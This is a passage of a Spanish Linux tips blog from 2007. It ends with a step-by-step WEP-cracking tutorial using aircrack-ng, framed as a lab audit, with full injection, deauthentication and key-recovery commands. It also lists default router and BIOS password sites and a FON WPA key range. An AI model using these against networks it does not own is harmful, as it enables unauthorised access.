miércoles, 21 de noviembre de 2007

Lanzador de aplicaciones

Launch Box, es un lanzador de aplicaciones. Inspirado en Quicksilver de Mac OS X.
Esta escrito para GNOME 2.10, y posteriores. Depende de:
  1. TK+ 2.6
  2. evolution-data-server 1.2
  3. gnome-menus
Los módulos (funciones) de búsqueda y apertura, soportan:
  1. Aplicaciones de inicio y lanzadores.
  2. Contactos y correos de Evolution.
  3. Archivos recientes y del escritorio.
  4. Marcadores de firefox y páginas abiertas

Instalación de "gnome-launch-box"
  • sudo aptitude install gnome-launch-box

Ejecución
  • gnome-launch-box
Argumentos:
-n -> Se oculta al abrirse
-t -> Añade transparencias
Nota: Metacity requiere -n y CompizFusion -nt

Configuración:
  1. Configurar Gnome
    1. Ir al "Editor de configuración"; opciones:
      1. Pulsar “Alt+F2” y ejecutar "gconf-editor"
      2. Aplicaciones > Herramientas del sistema > Editor de configuración
    2. Modificar la clave "apps > gnome-launch-box > bindings"
      1. En "activate" se puede modificar el valor por defecto "<Alt>Space"

  2. Cargarlo al inicio de sesion
    1. gnome-launch-box [argumentos]

  3. Configurar CompizFusion
    1. Ir a "Compiz Settings Manager > General"
      1. En "Commands"
        • gnome-launch-box -nt
      2. En "Actions > Commands"
        • Introducir la combinación de teclas

  4. Para finalizar, cierra la sesión y vuelve a entrar.

jueves, 6 de septiembre de 2007

Montar imagen en windows

Para montar una imagen en windows disponemos de una herramienta gratuita de microsoft; se trata de un ejecuable que no requiere instalación y soporta una amplia gama de formatos.

Podemos descargarlo en la página de soporte de microsoft:
http://technet.microsoft.com/es-es/subscriptions/ms772427.aspx
He colgado capturas de Virtual CDRom Control Panel, en mi Guía Visual, en la barra de la derecha.
28/10/2007

jueves, 23 de agosto de 2007

Wine

Wine es acrónimo de "Wine Is Not an Emulator"; permite ejecutar software de Windows en Gnu/Linux y Unix. Wine-doors es un complemento imprescindible; similar a Automatix.

Además permite validar una distribución, como un sistema original de Microsoft.
Mirar el Catálogo de Software, en la barra de la derecha, para ver la información sobre estos programas.
28/10/2007

Conección Remota

VNC es un programa multiplataforma, implantado en varias distribuciones. Su uso es muy extenso, al igual que el descubrimiento de sus vulnerabilidades. En esta práctica se ha usado REALVNC, su página web es www.realvnc.com.
Siempre es imprescindible establecer una contraseña, a pesar de que usa contraseñas débiles. Su instalación es sencilla, y al ser independiente del Sistema Operativo es una gran utilidad de administración.
Se ha realizado una guía de RealVNC; instalación, configuración y conexión; entre Windows y Suse 10 (ya que no trae VNC por defecto).
28/10/2007

domingo, 29 de julio de 2007

Configuración de Firefox

Nota:
  • Recomiendo que te registres, en UbuntuForums.
  • Mirar la sección Guía Visual.

Cambiar el aspecto de los botones html
El hilo oficial se encuentra en los http://ubuntuforums.org.
1. Descargar firefox-widgets.
Si quieres puedes descargarlo desde mi foro.

2 Descomprimir
  • tar xvf firefox_widgets_2.7.tar.bz2

3. Instalar, entrar en "firefox_widgets_2.7" y ejecutar el instalador
  • ./install

4. Reiniciar Firefox

Configuración
Para ir al editor de configuración, debes escribir en el navegador "about:config".
Se indicará en modo: Clave -> Defecto -> Optimización
Opciones recomendadas
Límite de MB para Cache
  • browser.cache.disk.capacity -> 128000
Deshabilitar el protocolo ipv6, ya que aún se usa como entandar ipv4; esto provoca que las aplicaciones que usan internet respondan lentamente. Además se obtiene una respuesta dns mas rápida.
  • network.dns.disableIPv6 -> true
  • network.http.max-connections -> 128
  • network.http.max-connections-per-server -> 32
    • Algunos servidores bloquean las conexiones si exceden de 20 a 30
  • network.http.max-persistent-connections-per-proxy -> 24
  • network.http.max-persistent-connections-per-server -> 16
  • network.enableIDN -> False
    • Esto es por seguridad, debido a una vulnerabilidad

Opciones opcionales
1.- Pre-fetch.- Descarga páginas e imágenes de enlaces que es posible que se visiten. Acelerar la navegación pero consume mucha CPU y memoria.
  • network.prefetch-next false
A veces al poner este valor al acceder a galerías o álbunes web, no presenta todas las imágenes; pero muestra antes los contenidos.

2.- Mejorar la descarga de páginas si se dispone de banda ancha, mediante conexiones simultaneas
  • network.http.pipelining → true
  • network.http.pipelining.maxrequests → 30
  • network.http.proxy.pipelining → true

sábado, 28 de julio de 2007

Optimizar Ubuntu para un escritorio

Configurar sistema
1.- Editar /etc/hosts
Modificar las 2 primeras lineas de /etc/hosts:
  • sudo gedit /etc/hosts
127.0.0.1 localhost <nombre_de_tu_host>
127.0.1.1 <nombre_de_tu_host>
modificar con:
127.0.0.1 localhost nombreordenador
127.0.1.1 nombreordenador

2.- fstab
La prioridad por defecto con la que está montada la SWAP le da un valor de -1; es como si no existiese una partición de intercambio. Si no corriges el fstab el apartado de Swappiness no se debe leer. En la columna de opciones de la SWAP se debe dar una prioridad de 1000; a mi me gusta la SWAP y la tengo configurada así : sw,pri=1500

Además; la comprobación automática de los discos al arrancar suelen dar en ocaciones problemas; por lo que aconsejo cambiar la sexta columna <pass > o último valor; de todas las líneas a 0. Esto evitará la comprobación del sistema de archivos al arrancar.
  • sudo gedit /etc/fstab

Esta es mi configuración del fstab:
# /etc/fstab: static file system information.
#
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
# /dev/sda1
UUID=f391e85e-1f63-4462-96f0-bd3097b38455 / ext3 defaults,errors=remount-ro 0 0
# /dev/sda5
UUID=7e7a53e4-436b-4c54-beea-ea15d26892f5 /media/Datos ext3 defaults 0 0
# /dev/sda2
UUID=e1f96e1d-595b-45c1-9217-1acf6be90d53 none swap sw,pri=1500 0 0
/dev/hdc /media/cdrom0 udf,iso9660 user,noauto,exec 0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto,exec 0 0

3.- Swappiness

Por defecto, en la rama del kernel 2.6, el núcleo de linux usa el 60% de la swap (memoria de intercambio). Esta configuración es útil para un servidor con una gran carga de trabajo y poca RAM, o si compilamos frecuentemente aplicaciones grandes. Para un escritorio, con aplicaciones pequeñas ejecutándose, se puede disminuye el uso de la Swap para forzar el uso de memoria RAM; fijándolo el valor a 10.

Personalmente según mi experiencia, creo que no es muy recomendable bajar tanto el valor; si usas programas que requieran una cantidad considerable de recursos, efectos gráficos, mantienes ejecutándose varias aplicaciones simultáneamente y además no dispones de un ordenador potente. En mi caso sobre vivo con:
  • Celeron D, 3 GHz, 256 kb de Cache
  • 2 Módulos de 512 de DDR, en canal dual
  • ASUS EAX 1050 (chip de ATI); sin soporte para linux.
Pero mis 2048 MB de super SWAP con una prioridad de de 1500; que mantienen la configuración por defecto de vm.swappiness=60; me permiten tener sin problemas Compiz Fusion, con el decorado de ventanas Emerald; Azureus; VirtualBox; un servidor LAM; Gnome Do; OpenOffice.org; Firefox; Kopete y Exaile. Cuando necesito un escritorio básico, (en pocas ocasiones), para ganar potencia si que sigo este apartado. En conclusión si es un escritorio básico realiza este paso, en caso contrario prueba la configuración que más se adapte a tu medida.

Mirar el valor actual
  • sudo cat /proc/sys/vm/swappiness
Comprobar cómo funciona el sistema cambiando el valor actual:
  • sudo sysctl -w vm.swappiness=10
Si el resultado ha sido satisfactorio, editar /etc/sysctl.conf:
  • sudo gedit /etc/sysctl.conf
vm.swappiness=10

4.- Deshabilitar IPv6
Editar /etc/modprobe.d/aliases:
  • sudo gedit /etc/modprobe.d/aliases
alias net-pf-10 ipv6
modificar con:
alias net-pf-10 off #ipv6


5.- Desactivar consolas virtuales
Al acceder al sistema además de la pantalla gráfica, hay 6 consolas en modo texto ejecutándose en segundo plano (para acceder pulsar CONTROL+ALT+(F1 a F6; con F7 vuelve al sistema gráfico); cada una ocupa 1,5 megas de RAM. Se puede ahorrar memoria dejando sólo 1 por precausión si el sistema gráfico falla.
Editar /etc/event.d/tty(nº de consola) comentando todas las líneas, con almohadilla #, en cada consola que no queremos que se inicie.
  • sudo gedit /etc/event.d/tty(nº de consola)
1:2345:respawn:/sbin/getty 38400 tty1
#2:23:respawn:/sbin/getty 38400 tty2
#3:23:respawn:/sbin/getty 38400 tty3
#4:23:respawn:/sbin/getty 38400 tty4
#5:23:respawn:/sbin/getty 38400 tty5
#6:23:respawn:/sbin/getty 38400 tty6


6.- Permitir procesos en paralelo
Editar /etc/init.d/rc:
  • sudo gedit /etc/init.d/rc
CONCURRENCY=none
modificar con:
CONCURRENCY=shell

Añadir utilidades
1- Preload
Aplicacion que precarga en memoria las aplicaciones más habituales, para arrancarlas más rapido.
Instalación
  • sudo apt-get install preload

MD5

MD5 es un algoritmo de reducción criptográfico; que se utiliza habitualmente para conocer si un archivo descargado de internet ha sido alterado de una manera maliciosa, una descarga corrupta o incompleta. En sistemas UNIX y GNU/Linux se utiliza el algoritmo MD5 para cifrar las claves de los usuarios. También se puede usar para comprobar que los correos electrónicos no han sido alterados usando llaves públicas y privadas.
Utilización
md5sum [opciones] [ficheros]

Ejemplos:
El comando md5sum devuelve la suma MD5 de los ficheros que se le indique
  • md5sum slackware-12.0-install-dvd.iso
b6b4320fdcf960264bbffbaa39f4430a slackware-12.0-install-dvd.iso

Para calcular la suma de un fichero en concreto usar la opción "c":
  • md5sum -c slackware-12.0-install-dvd.iso.md5
slackware-12.0-install-dvd.iso: La suma coincide

viernes, 27 de julio de 2007

Repositorio

Un repositorio, es un sitio donde se centralizan bases de datos de archivos; para distribuirse por red o un medio físico.

Se debe editar sources.list para añadir un repositorio, colocándolo el repositorio nuevo al final. Para añadir comentarios usar "#"
  • sudo gedit /etc/apt/sources.list

Después se debe regenerar la lista de repositorios
  • sudo apt-get update

Si os interesa este es mi catálogo de programas y repositorios que utilizo con Ubuntu Gutsy Gibbon ,Feisty Fawn, y varios genéricos con varias información; como el link a la página oficial para buscar información para otras distribuciones.



jueves, 26 de julio de 2007

Configuración administrativa de hardware

Para configurar cualquier hardware vasta con conocer conceptos escenciales; y/o disponer del manual. Una página básica para configurar dispositivos, conexiones de red, etc es http://www.adslayuda.com.
El problema potencial es configurar un equipo del que desconocemos los parámetros de configuración por defecto; por eso debemos conocer páginas con estos datos:

Router
http://www.routerpasswords.com
http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php
http://www.anameless.com/blog/default-passwords.html
http://www.glug-howrah.org/modules.php?name=Forums&file=printview&t=386&start=0
http://ap0c.freeflux.net/files/router-default-list.txt

Bios
http://www.cirt.net/cgi-bin/passwd.pl
http://www.xs4all.nl/~matrix/mpwlist.html
http://www.elfqrin.com/docs/biospw.html

General
http://www.phenoelit-us.org/dpl/dpl.html

WPA de FON
Utiliza contraseñas comprendidas en el rango 8651022000 : 8651023999

viernes, 20 de julio de 2007

Swiftfox

Swiftfox es un Mozilla Firefox compilado para cada procesadores AMD o Intel en concreto. La optimización apenas se nota pero siempre se agradece; sobre todo para los más exigente. Además se implementan varias opciones extras.

Existe varias formas de instalarlo; para una instalación independiente de la distribución visitar su página oficial http://getswiftfox.com. Se puede instalar mediante un .sh, .deb, binarios o añadirlo a los repositorios para Debian y distribuciones basadas en este (Ubuntu), aún así visita la página para ver la lista paquete específico para cada procesador. Además disponemos de la versión de desarrolla basada en el próximo Firefox3. Debo añadir que se encuentra presente en Automatix pero no recomiendo este tipo de instalación aunque sea la más sencilla.



Instalación
(Debian y distribuciones basadas en Debian)
1.- Se debe editar /etc/apt/sources.list para añadir el repositorio
Nota: añadir al final el repositorio; # es un comentario opcional
  • nano /etc/apt/sources.list
#Repositorio swiftfox
deb http://getswiftfox.com/builds/debian unstable non-free

2.- Instalación independiente de la distribución
Busca en el gestor de paquetes Synaptic en Gnome, Adept en KDE; "swiftfox" y elige el paquete específico para tu procesador

Opinión personal:
Esta pensado en nuestra comunidad de novatos más entusiastas; para tener la máxima optimización sin complicaciones. Un gran proyecto propaganda, que ínsita a migrar y a conocer el lado obscuro de los usuarios de SO de pago. GNU Linux no muerde; simplemente según tu grado de conocimiento podrás optimizarlo más aún.

jueves, 19 de julio de 2007

Introducción a Ubuntu

Software libre
El software libre una vez obtenido, puede ser usado, copiado, estudiado, modificado y redistribuido libremente, bajo ciertas normas. Es importante no asociar libre con gratis.
Al instalar un sistema nuestros impulsos nos piden software; es recomendable descargar a través de la página oficial, en el caso de software libre exclusivamente ir a http://www.gnu.org. Aunque antes recomiendo visitar http://www.guia-ubuntu.org, ya que dispone de una amplia gama de documentación, manuales de utilización de software y sobre todo para configurar el equipo y optimizarlo; y si necesitas información a modo de introducción visita la wikipedia.

La madre de las centrales de desarrollos de software es http://sourceforge.net, controla y gestiona varios proyectos de software libre; y actúa como un repositorio de código fuente. Un sitio que dispone exclusivamente de paquetes deb http://www.getdeb.net. En el tema de entretenimiento visitar http://www.ubuntugames.org.

Soporte Adicional
Quizá lo mejor de ubuntu es su comunidad de ubuntu.; la publicidad más rápida son los rumores, chismes y todo lo referente a dialogo entre iguales. La comunidad ubuntera es una de las más activas, si buscas documentación y noticias oficiales ve a http://www.ubuntu-es.org; aunque en mi opinión es recomendable formar parte de los Argonautas de Blogs; las ventajas de navegar por blogs es una actualización periódica de los mejores blogs y sobre todo se encuentra guías muy buenas con un catálogo muy extenso, sin fin de referencias, noticias; es la manera más eficaz de mantenerte al día. Sólo quisiese poner referencias hispanas; porque sólo suelo usar documentación en español; pero la verdad es que en este peregrinaje todos los caminos conducen a Roma http://ubuntuforums.org, quizá sea el único sitio en inglés que a veces frecuento.

Libertad de conocimiento
La libertad de compartir el conocimiento es la base del software libre; y gracias ha esto podemos disponer de documentación y soporte; por eso es importante recordar ayudar a este fin; y sobre todo mensiono en ayudar a los wiki como el ya mensionado http://www.guia-ubuntu.org, porque suele presentar cosas desactualizadas pero aún así gracias aún a sus artículos antiguos llegamos a resolver nuestros problemas; pero muchas veces se nos olvida ayudar a la comunidad oficial directamente y no actualizamos el wiki; así que por favor si encuentras un contenido desactualizado ayuda a la comunidad en un rato libre. Esto lo pido simplemente como un usuario más.

Software equivalente
Si ha migrado desde windows quizá le sirvan las comparaciones de software:

Personalizar

No se hará referencia a personalización por software; simplemente a personalizar Gnome, para conseguir un estilo y diseño vanguardista; para ello su sitio oficial http://art.gnome.org . No pongo ningún enlace porque esta página se actualiza con frecuencia y esta muy bien estructurada


Les dejo la mejor página que he encontrado, con una gran cantidad de contenido http://www.gnome-look.org . Y os dejo unos Links a mis descargas favoritas http://docs.google.com/Doc?id=ddhpfdtk_4df7xm2



lunes, 16 de julio de 2007

Personalizar Nautilus

Personalizar el menú contextual de Nautilus
Mediante nautilus-actions podemos añadir elementos o acciones al menú contextual de Nautilus, el gestor de ficheros de Gnomeficheros de Gnome

1.- Instalación de nautilus-actions
sudo apt-get install nautilus-actions
o con apt-build, de una forma más profesional:
sudo apt-build install nautilus-actions


2.- Opción para subir un fichero al móvil por bluetooth
2.1.- Ejecutar nautilus-actions
Sistema -> Preferencias -> Configuración de acciones Nautilus.



2.2.- Elegir crear una nueva acción con el botón "Añadir".
*Etiqueta: Subir al móvil
*Consejo: No subas porno!
*Icono: cualquiera...
*Acción: gnome-obex-send
*Parámetros: -d 00:00:00:00:00 %M
o Donde 00:00:00:00:00 es el id de vuestro móvil (obtenido mediante hcitools scan).


2.3.- Para subir un fichero desde Nautilus
Hacer clic derecho en un fichero, y seleccionar Subir al móvil.


Nota:
Ya escribiré algo sobre bluetooth; para dejar una guía completa. Las capturas están en mi albún web
http://picasaweb.google.com/elleonplateadodeojosrojos/ConfigurarEquipo
Este artículo hace referencia a una publicación del maestro javierperez
http://javierperez.eu/taller-ubuntu-anadir-accion-al-menu-contextual-de-nautilus-para-subir-un-fichero-a-tu-movil/

viernes, 13 de julio de 2007

Filosofía

El miedo es el temor al miedo en si mismo; por eso es conveniente conocer la filosofía irónica del mundo de la informática.


LEY DE MURPHY
"si existe la posibilidad de que algo pueda salir mal, saldrá mal"

Corolarios
  1. Nada es tan fácil como parece.
  2. Todo lleva más tiempo del que usted piensa.
  3. Si existe la posibilidad de que varias cosas vayan mal, la que cause más perjuicios será la única que vaya mal.
  4. Si usted intuye que hay cuatro posibilidades de que una gestión vaya mal y las evita, al momento aparecerá espontáneamente una quinta posibilidad.
  5. Cuando las cosas se dejan a su aire, suelen ir de mal en peor.
  6. En cuanto se ponga a hacer algo, se dará cuenta de que hay otra cosa que debería haber hecho antes.
  7. Cualquier solución entraña genera nuevos problemas.
  8. Es inútil hacer cualquier cosa a prueba de tontos, porque los tontos son muy ingeniosos.
  9. La naturaleza siempre está de parte de la imperfección oculta.
  10. La madre Naturaleza es una perra.

FILOSOFÍA DE MURPHY.
Sonría. Mañana puede ser peor

Leyes para programar un ordenador:
  1. Cualquier programa dado, al ejecutarlo se vuelve obsoleto.
  2. La realización de cualquier programa dado cuesta más y lleva más tiempo.
  3. Si un programa es útil, por algún motivo deberá cambiarlo.
  4. Si un programa es inútil, deberá ser documentado.
  5. Cualquier programa dado se expandirá para llenar toda la memoria disponible en la computadora.
  6. El valor de un programa es proporcional al peso de su información de salida.
  7. La complejidad del programa aumenta hasta que excede la capacidad del programador que debe llevarlo a cabo.

Ley de Greer
  • Un programa de ordenador hace lo que usted le ordena que haga, no lo que usted quiere que haga.

Postulados de Troutman sobre programación:
  • Si un editor de entrada ha sido diseñado para rechazar las malas entradas, algún idiota ingenioso descubrirá la forma de que éstas pasen.
  • La maldición es el lenguaje que mejor conocen todos los programadores.

Principio de Shaw
  • Diseñe un sistema que hasta un tonto pueda utilizar, y solamente un tonto lo querrá emplear.

Leyes de Manubay para los programadores
  • Si funciona la modificación que hace un programador a un programa ya existente, es probable que no sea lo que quieren los usuarios.
  • Los usuarios no saben realmente lo que quieren, pero saben con certeza lo que no quieren.

Principio de Pollyanna sobre la IBM
  • Las máquinas deben funcionar y las personas, pensar.

Regla de Sutin
  • De todas las cosas que se pueden hacer con un ordenador, las más inútiles son las más divertidas.

Axioma informático de Leo Beiser
  • Cuando archive algo en la memoria, acuérdese de dónde lo guardó.

Axiomas informáticos de McCristy
  • Los archivos de apoyo nunca estarán completos
  • Los fallos del software se pueden corregir sólo cuando la industria considera que se ha quedado obsoleto.

Ley de Lubarsky sobre la entomología cibernética
  • Siempre queda algún virus.

Ley de Smith sobre reparación de ordenadores
  • Los orificios de acceso tendrán medio milímetro menos de diámetro.

Ley sobre los módulos de Ram de Protel
  • Si se deja un ordenador abierto sobre una mesa, los módulos de memoria tenderán a desaparecer espontáneamente.

Leyes de Gilb acerca de la falta de fiabilidad
  • No se puede confiar en las computadoras, pero menos aún en los seres humanos.
  • Cualquier sistema que dependa de la confianza en seres humanos, es poco fiable.
  • Los errores imposibles de descubrir son infinitos en su variedad, en contraste con los detectables que por definición son limitados.
  • Las inversiones para asegurar fiabilidad aumentarán hasta que excedan el coste probable de los errores que puedan presentarse o hasta que alguien insista en hacer algún trabajo útil.

Leyes de computación de acuerdo con Golub
  • Los objetivos de un proyecto, definidos en forma confusa, se utilizan para evitar la molestia de hacer la correspondiente estimación de costos.
  • Un proyecto mal planeado se lleva tres veces el tiempo estimado para terminarse, uno bien planeado tomará solamente el doble.
  • El esfuerzo requerido para corregir el rumbo aumenta geométricamente con el tiempo.
  • Los equipos de trabajo detestan los informes semanales de avance porque en éstos se demuestra en forma evidente la falta de progreso.




martes, 10 de julio de 2007

Azureus

Azureus

Instalación
  1. Synaptic



Problemas
Azureus se cierra despues de la pantalla de inicio.

Explicación:
El problema es debido a incompatibilidad con Java

Solución

Introduce en la terminal:

  • sudo update-alternatives --config java
Seleccionas la opcion /usr/lib/jvm/java-7-icedtea/jre/bin/java

jueves, 5 de julio de 2007

Desencriptar contraseña WEP con BackTrack


Comprobación de seguridad Wifi;
Desencriptar una contraseña WEP.

Fecha última actualización
18 de Junio del 2007

Licencia
Esta práctica aplica los conocimientos extraídos de documentación oficial; y la asistencia a una demostración; por tanto esta práctica no hace referencia a otra ni precisamente es autodidacta, es el resultado de saber lo que hay que hacer y aplicarlo; por tanto es un trabajo original.

Esta documentación se encuentra bajo la licencia Creative Commons; se tiene permiso para citar, reproducir, crear obras derivadas ofrecerlo públicamente y con diferentes restricciones como no permitir el uso comercial y respetar la autoría original.

Nomenclatura
< Atributo o parámetro que se debe introducir >
*** Falta datos relevantes o que se actualizarán en el futuro ***



Agradecimientos
Me considero una persona escéptica así que no empezaré confesándome; ya que cuando he comprobado didácticamente la seguridad de terceros nunca se ha violado la privacidad de datos. Para realizar esta práctica vastó con asistir a una clase impartida por JoseLu, al siguiente día en una hora libre familiarizarse con la distribución y los comandos de los programas; si debo agradecer algo será la ayuda prestada por un profesor que se encontraba de guardia, llamado Eduardo YoQueSé..., que me presto su ayuda desinteresada para entre los dos aprender a manejar una distribución de linux.


Introducción
Este tutorial pretende comprobar el estado de seguridad Wifi en una empresa e inseguridad doméstica; conectándose a una red wireless que tenga encriptación WEP; pero no se hablará de infringir métodos de seguridad como VPN y túneles IPSEC. Se realizará un pequeño apartado que debería constar en una Auditoría, llamado Test de intrusión. Si quiere desarrollar la práctica porque piensa que esto lo convierte en un hacker... lo siento, esto es sumamente sencillo, en tal caso recomiendo que lea un libro de redes

Esta práctica se ha desarrollado tanto con la última versión de un liveCd de auditoría como con la penúnltima; es importante saber que las versiones de Backtrack2 (a pesar de llevar el mismo nombre) varían según la fecha de descarga, por modificaciones de Kernel, soporte de drivers, actualizaciones, etc; antes del 06 de Marzo de 2007. La práctica se ha realizado con la penúltima versión de BackTrack se ha desarrollado en un entorno controlado, a modo de laboratorio, ya que se hizo una demostración en clase; en la que el único obstáculo presente fue que el router presentaba el firmware actualizado; y que la última versión de BackTrack no soportaba aquellos monitores. Sin embargo en un entorno no controlado el único cambio substancial es el tiempo, en el que puede sobre pasar una hora e incluso mucho más; ya que los comandos cambian; por lo tanto también indicaré como realizarlos con la última versión con una demostración en un entorno desconocido.

Las capturas de la práctica en un entorno controlado con la penúltima versión de BackTrack, paso a paso se encuentran en http://picasaweb.google.com/elleonplateadodeojosrojos; y este manual sin formato lo podeis ver a
a

Importante
Proximamente se actualizará ya que la manera de introducir los comandos en las distintas versiones varia.
Aquí teneis el manual en un entorno desconocido; está resumido y los pasos iniciales estan mejor explicados; lo usaré para terminar este manual.
Mirar este manual para saber como usar la nueva versión.Manual
Conocimientos requeridos
    • Preparación de una taza de cola cao para disfrutar mientras se mantiene a la espera.
    • No se requiere conocimientos de Gnu/Linux; si se lee detenidamente para comprender el procedimiento. No se preocupe Linux no muerde y se explicará todo detalladamente. Ha decir verdad hay mucha gente que saber hacerlo sin saber lo que está haciendo, y sólo por conseguirlo se considera un hacker. Pero los grandes y pequeños hacker están jodiendo a Microsoft continuamente; pues no tiene sentido joder a la libertad de expresión del software libre.


Herramientas utilizadas

BackTrack.- Distribución con una completa colección de utilidades de seguridad, disponible en http://www.remote-exploit.org. Dispone de scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless; de las que se utilizará:

  • La página de estas utilidades es www.aircrack-ng.org, la cual dispone de un excelente documentación en español en www.aircrack-ng.org/doku.php?id=spanish; además integra todo (sniffer, desencriptador, utilidades de configuración de red…) y además es multiplataforma Gnu/Linux y Windows.


Hardware requerido

Tarjeta de red inalámbrica; que permita cambiar a modo monitor, llamado también modo promiscuo.


Prologo
Antes de empezar debe saber lo que hará para descencriptar la contraseña WEP; en realidad solo son dos procedimientos:

"Un sniffer captura tramas del tráfico, dentro de las tramas capturadas está la clave encriptada; y un crackeador de claves mediante un algoritmo matemático la desencripta."

Debe tener en cuenta que si el punto de acceso no tiene ningún cliente asociado nuestros intentos van a ser en vano, con el ataque descrito a continuación, debido a que necesitamos hacer ARR spoofing ( suplantación de identidad por falsificación de tabla ARP ), de las peticiones ARP de un cliente que se encuentre conectado al punto de acceso.

Ahora que lo sabe, tengo que decirlo que existen varias formas de hacerlo en distintos Sistemas Operativos y con distintas utilidades, pero siempre es lo mismo.

En muchos casos (tiempo en función de la batería en un portátil, equipo ajeno... ) es necesario montar un usb, tanto para disponer de documentación como importar o exportar datos. Este apartado es circunstancial, pero es importante disponer de una guía completa y sencilla.

  • Crear directorio para montar el usb
      • #mkdir /mnt/usb

  • Montar en ese directorio
      • #mount /dev/sda1 /mnt/usb -t vfat
Si eso no funciona usa usbfs:
      • #mount /dev/sda1 /mnt/usb -t usbfs


Desarrollo
1.- Comprobamos el estado de la tarjeta
  • Ver el estado de la de red, mediante "iwconfig" es la versión wireless de "ipconfig" son utilidades de terminal que muestra la configuración de red actual.
      • #iwconfig

    • Por defecto la tarjeta suele estar configurada en Modo: Managed.
    • En esta práctica se usa una tarjeta de red llamada "rausb0".

Podemos encontrar dos problemas que no son habituales:
  1. Instalar drivers; si necesitas descargarlos de Internet y dispones de una conexión puedes usar "wget < ruta de la descarga>".
      • #wget "http://:www.LoQueSea.es/driver.tar.gz" *** Instalación de driver ***

  1. Activar o habilitar la tarjeta de red; algunas tarjetas, en ocasiones más posteriores al captar paquetes suele deshabilitarse; y tras activarlo varias veces deja de hacerlo; según experiencia personal; pero no se como activarlo permanentemente sin caídas desde la primera vez.
        • iwconfig <tarjeta de red> up.
#iwconfig rausb0 up.


2.- Configurar la tarjeta en modo promiscuo.
  • La tarjeta en modo promiscuo recibe todos los paquetes que puede captar. Se puede utilizar varios métodos distintos; en esta práctica se usa "airmon-ng start <tarjeta>".
      • #airmon-ng start rausb0
    • También se puede usar "iwconfig" para poner la tarjeta en modo promiscuo o modo monitor. "iwconfig mode monitor <tarjeta>"
      • #iwconfig mode monitor rausb0

  • Comprobamos el estado de la tarjeta.
      • #iwconfig
    • Comprobamos que ahora aparece Mode:Monitor


3.- Buscar redes mediante airodump-ng
  • Airodump-ng es un sniffer que se usa para capturar paquetes wireless 802.11 en un archivo compatible con formatos pcap de tcpdump, ethereal, etc. Para conocer todas las redes se introduce "airodump-ng <tarjeta>" sin parámetros .
      • airodump-ng <tarjeta>
airodump-ng rausb0

    • Esperar hasta que en la parte inferior aparezca la red que queremos desencriptar, si el ESSID no aparece reconocer la red por la MAC del punto de acceso; para continuar debe tener BSSID y STATION; así no importa que no tenga el ESSID en la parte superior. En PWR podemos ver la señal de la red.
    • Si en la empresa disponemos de varias redes, debemos saber que en la red donde exista más tráfico, (esperar y la red con mayor paquetes Data es la de más tráfico.) es de la que más rápido se obtendrá la contraseña.

  • Abrir una nueva terminal para centrarse en un determinado Canal
    • Entre más parámetros se introduzcan en la terminal más eficiente y rápido será el proceso.
      • #airodump-ng --channel Canal -bssid BSSID -a STATION --ivs -w NombreParaFicheroDeCaptura Tarjeta

    • En esta práctica se usan los siguientes datos:
Canal: 11
BSSID: 00:0E:2E:7C:63:74
STATION: 00:04:E2:81:A2:AA
Fichero para guardar la captura: captura
Tarjeta inalámbrica: rausb0
Opción para filtrar los paquetes --ivs
    • IVS son vectores de inicialización

#airodump-ng --channel 11 -bssid 00:0E:2E:7C:63:74 -a 00:04:E2:81:A2:AA --ivs -w captura rausb0
    • Cerrar la terminal anterior.
    • Prestar atención en la velocidad de incremento de Data


4.- Incrementar el trafico, mediante inyección de paquetes ARP con aireplay-ng
  • Cuando en la anterior Terminal airodump-ng muestre un cliente en la parte inferior empiece el ataque.
    • Inyectar tráfico mediante "aireplay-ng" con la opción "arpreplay"; y "FF:FF:FF:FF:FF:FF" que es la dirección de broadcast.
      • #aireplay-ng --arpreplay -b <BSSID> -d FF:FF:FF:FF:FF:FF -h <BSSID> <tarjeta de red>
#aireplay-ng --arpreplay -b 00:0E:2E:7C:63:74 -d FF:FF:FF:FF:FF:FF -h 00:04:E2:81:A2:AA rausb0

    • Desconectar al cliente. Este es un método agresivo pero eficaz; en caso de querer pasar inadvertido es peligro ya que el cliente podría sospechar, así que usar con precaución, al decir precaución no tenga miedo de hecho no se usará ningún preservativo. Los SO limpian la cache ARP cuando son desconectados; para reconectarse un clientes envía "ARP requests" así que se desconectará a un cliente para que se reconecte y así capturar un "ARP-request"; además podemos conocer el ESSID durante la reconexión, si el ESSID está oculto. Abrir una terminal y usar "aireplay-ng" con la opción "--deauth 5" para desconectar al cliente.
      • #aireplay-ng --deauth 5 -a <BSSID> -c <BSSID> <tarjeta de red>
#aireplay-ng --deauth 5 -a 00:0E:2E:7C:63:74 -c 00:04:E2:81:A2:AA rausb0

    • En función del tráfico de red tendremos que esperar; para obtener una clave de 64 bits se requiere capturar de 50000 a 200000 IVs y para 128 bits se necesitan de 200000 a 700000 IVs. Este es el momento ideal para


5.- Desencriptar con aircrack-ng
  • Crackeador para desencriptar contraseñas 802.11 WEP y WPA/WPA2-PSK P es recomendable usar todos los filtros disponibles para disminuir considerablemente el tiempo sacar la contraseña; no aconsejo hacerlo mientras se está ejecutando "airodump-ng" porque aunque es posible sacarla antes si es una contraseña muy débil, la mayoría de veces sólo ralentiza en exceso los procesos de los dos procesos.
      • #aircrack-ng -a 1 -b <BSSID> -e <BSSID> -n <Tamaño de la clave, la de 128 es usual> <"Nombre del fichero de captura"+"-01.ivs">
#aircrack-ng -a 1 -b 00:0E:2E:7C:63:74 -e 00:04:E2:81:A2:AA -n 64 captura-01.ivs

    • Si has parado el proceso, mira la carpeta donde guardas la captura y elije el paquete .ivs con mayor tamaño.
    • Y al final saldrá la contraseña en un formato
      • KEY FOUND! [ 12:34:56:78:9A ]
      • Probability: 100%

KEY FOUND! [ 12:34:56:78:9A ]
Probability: 100%


6.- Conectar
      • iwconfig < tarjeta > essid ssid key [ clave ]
iwconfig rausb0 essid ssid key 12:34:56:78:9A

Anexo
Investigadores Alemanes han extendendido algoritmo de Andreas Klein logrando reducir la cantidad de paquetes requeridos para crackear una red inalámbrica con seguridad WEP a 85.000 paquetes; con una reducción de tiempo impresionante. Este algoritmo ha sido implementado en una nueva versión de la suite aircrack llamada AIRCRACK-PTW cuya web oficial es http://www.cdc.informatik.tu-darmstadt.de

Epílogo
Esta manual no debe ser usada para realizar
